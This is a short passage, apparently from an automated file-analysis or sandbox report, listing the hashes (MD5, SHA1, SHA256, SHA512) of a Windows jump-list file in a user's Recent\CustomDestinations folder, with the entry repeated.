SHA5126646d64744184291ad11276d7d77f61b50358d96d9ee2fec55471cca465cae4fd26e0cc835a3fbfa15e0cd1a2d7e1787ba02b6e59cdfb0bb9bd8d0ce7bd45ad9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD51d12c1f025dbd2a7438a1e73102ab6aa
SHA19f8cdb35a3df7a146ecd448e74379d2531acdfa2
SHA256b4b3626b5a6c9fabb0c9227bfbbad1c8ea6c8123d59eb57f5a2ec0a308d813f3
SHA5126646d64744184291ad11276d7d77f61b50358d96d9ee2fec55471cca465cae4fd26e0cc835a3fbfa15e0cd1a2d7e1787ba02b6e59cdfb0bb9bd8d0ce7bd45ad9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD51d12c1f025dbd2a7438a1e73102ab6aa
SHA19f8cdb35a3df7a146ecd448e74379d2531acdfa2
SHA256b4b3626b5a6c9fabb0c9227bfbbad1c8ea6c8123d59eb57f5a2ec0a308d813f3
SHA5126646d64744184291ad11276d7d77f61b50358d96d9ee2fec55471cca465cae4fd26e0cc835a3fbfa15e0cd1a2d7e1787ba02b6e59cdfb0bb9bd8d0ce7bd45ad9